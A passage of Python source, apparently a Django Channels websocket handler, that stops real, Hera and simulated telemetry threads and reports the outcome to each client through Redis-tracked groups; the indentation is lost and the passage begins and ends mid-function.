# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real at thread and real telemetry was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Real telemetry thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real at thread was not alive and real telemetry thread was '
'already dead. Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
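# The hera-group branch below mirrors the sEclss handling: discard the channel from its group,
# signal the hera telemetry / anomaly-detection threads to stop once no listeners remain, and
# report the outcome back to the client.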
elif r.sismember('hera-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.hera_thread is None and global_obj.hera_at_thread is None:
r.srem('hera-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("hera-group", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to hera telemetry but hera telemetry and hera at threads'
' are not initialized.',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.hera_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera at thread and hera telemetry was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Hera telemetry thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera telemetry thread was not initialized and hera at thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.hera_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping hera telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera telemetry thread and hera at was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Hera at thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera at thread was not initialized and hera telemetry thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.hera_thread.is_alive() and global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("hera-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_hera_telemetry'})
# Ensure that the thread stops
successful = True
sEclssMessage = ''
atsEclssMessage = ''
global_obj.hera_thread.join(2.0)
if global_obj.hera_thread.is_alive():
successful = False
sEclssMessage = 'There was an error stopping the hera telemetry thread.'
global_obj.hera_at_thread.join(2.0)
if global_obj.hera_at_thread.is_alive():
successful = False
atsEclssMessage = 'There was an error stopping the hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping the hera telemetry. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd('hera-group-users', self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': sEclssMessage + ' ' + atsEclssMessage,
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only hera telemetry thread is alive
elif global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping hera telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera telemetry thread and hera at was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Hera at thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive
elif global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera at thread and hera telemetry was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Hera telemetry thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera at thread was not alive and hera telemetry thread was '
'already dead. Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
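# Fake telemetry slots one through four are handled below with the same pattern, indexed into
# global_obj.simulator_threads / simulator_at_threads and their per-slot hub queues; each slot
# tracks its users in a dedicated Redis set (fake-telemetry-one ... fake-telemetry-four).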
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[0] is None and global_obj.simulator_at_threads[0] is None:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry one but the fake at thread 1 and fake '
'telemetry thread 1 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[0] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 1 and fake telemetry 1 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 1 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 1 thread was not initialized and fake at thread 1 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[0] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 1 and fake at 1 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 1 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 1 was not initialized and fake telemetry 1 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[0].is_alive() and global_obj.simulator_at_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_one'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread one.'
global_obj.simulator_at_threads[0].join(2.0)
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry one. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' ' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 1 and fake at 1 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake at thread 1 was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 1 and fake telemetry 1 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 1 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then send back already killed message
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 1 and fake at thread 1 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[1] is None and global_obj.simulator_at_threads[1] is None:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry two but the fake at thread 2 and fake '
'telemetry thread 2 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[1] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 2 and fake telemetry 2 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 2 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 2 thread was not initialized and fake at thread 2 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[1] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 2 and fake at 2 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 2 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 2 was not initialized and fake telemetry 2 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[1].is_alive() and global_obj.simulator_at_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_two'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread two.'
global_obj.simulator_at_threads[1].join(2.0)
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry two. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' ' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 2 and fake at 2 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake at thread 2 was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 2 and fake telemetry 2 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 2 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then send back already killed message
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 2 and fake at thread 2 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[2] is None and global_obj.simulator_at_threads[2] is None:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry three but the fake at thread 3 and fake '
'telemetry thread 3 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[2] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 3 and fake telemetry 3 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 3 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 3 thread was not initialized and fake at thread 3 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[2] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 3 and fake at 3 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 3 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 3 was not initialized and fake telemetry 3 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[2].is_alive() and global_obj.simulator_at_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_three'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread three.'
global_obj.simulator_at_threads[2].join(2.0)
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry three. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' ' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
